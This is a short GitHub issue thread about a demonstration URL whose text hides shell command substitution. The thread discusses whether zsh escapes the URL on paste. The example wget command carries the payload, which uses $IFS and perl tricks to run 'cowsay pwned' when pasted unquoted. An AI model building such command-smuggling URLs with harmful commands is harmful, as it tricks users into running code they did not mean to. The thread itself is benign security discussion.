### ISSUE TITLE
zsh paste will correctly escape this

### ISSUE THREAD

**Issue by b4ldr** [jwilk/url.sh#1]
just a note that this doesn't work in zsh with default config as it will correctly escape on paste e.g.

```shell
$ wget http://example.com/\;'$(gt=$(perl$IFS-E$IFS's//62/\;s/62/chr/e\;say');eval$IFS''cowsay$IFS''pwned$IFS$gt/dev/tty)'\;cowsay$IFS''pwned
--2022-09-09 13:54:46--  http://example.com/;$(gt=$(perl$IFS-E$IFSs//62/;s/62/chr/e;say);eval$IFScowsay$IFSpwned$IFS$gt/dev/tty);cowsay%20%09%0A
Resolving example.com (example.com)... 93.184.216.34, 2606:2800:220:1:248:1893:25c8:1946
Connecting to example.com (example.com)|93.184.216.34|:80... connected.
HTTP request sent, awaiting response... 404 Not Found
2022-09-09 13:54:46 ERROR 404: Not Found.
```

**Comment by jwilk** [comment]
Hmm, the `url-quote-magic` feature would do that, but it's not enabled by default in my zsh (5.9 from Debian unstable).

**Comment by b4ldr** [comment]
> Hmm, the `url-quote-magic` feature would do that, but it's not enabled by default in my zsh (5.9 from Debian unstable).

Ahh yes you are right, i must have enabled it manually at some point sorry for the noise

**Comment by jwilk** [comment]
But see #2.
